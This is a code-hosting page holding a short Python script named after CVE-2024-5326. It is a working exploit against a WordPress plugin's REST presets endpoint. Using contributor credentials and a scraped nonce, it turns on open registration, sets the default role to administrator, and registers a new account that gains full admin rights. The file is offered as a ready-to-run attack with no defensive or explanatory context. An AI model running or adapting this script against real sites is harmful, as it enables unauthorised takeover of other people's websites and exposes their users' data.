-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2024-5326.py
41 lines (34 loc) · 1.52 KB
/
CVE-2024-5326.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
import requests
import re
import json
url = input('url: ')
username = input('User Contributor: ')
password = input('Password Contributor: ')
username_register = input('Register username: ')
email_register = input('Register email: ')
session = requests.Session()
session.cookies['wordpress_test_cookie']='WP%20Cookie%20check'
login_data = {
'log': username,
'pwd': password,
'wp-submit': 'Log In',
'testcookie': '1',
'redirect_to': url+'/wp-admin/'
}
login_response = session.post(url+'/wp-login.php', data=login_data)
print('Login User Contributor success!')
nonce = re.search('wpApiSettings = {.*,"nonce":(.*),.*};',login_response.text)
session.headers['X-WP-Nonce']= nonce.group(1).replace('"','')
post_data = {'type': 'set', 'key': '','data':''}
post_data['key'] = 'users_can_register'
post_data['data'] = 1
enable_register = session.post(url+'/wp-json/ultp/v1/postx_presets/', data=post_data)
print('Enable users_can_register: '+str(json.loads(enable_register.text)['success']))
post_data['key'] = 'default_role'
post_data['data'] = 'administrator'
set_role = session.post(url+'/wp-json/ultp/v1/postx_presets/', data=post_data)
print('Set default_role is administrator: '+str(json.loads(enable_register.text)['success']))
register_data = {'user_login':username_register,'user_email':email_register,'redirect_to':'','wp-submit':'Register'}
register_response = requests.post(url+'/wp-login.php?action=register',data=register_data)
if '/wp-login.php?checkemail=registered' in register_response.url:
print("Register success !")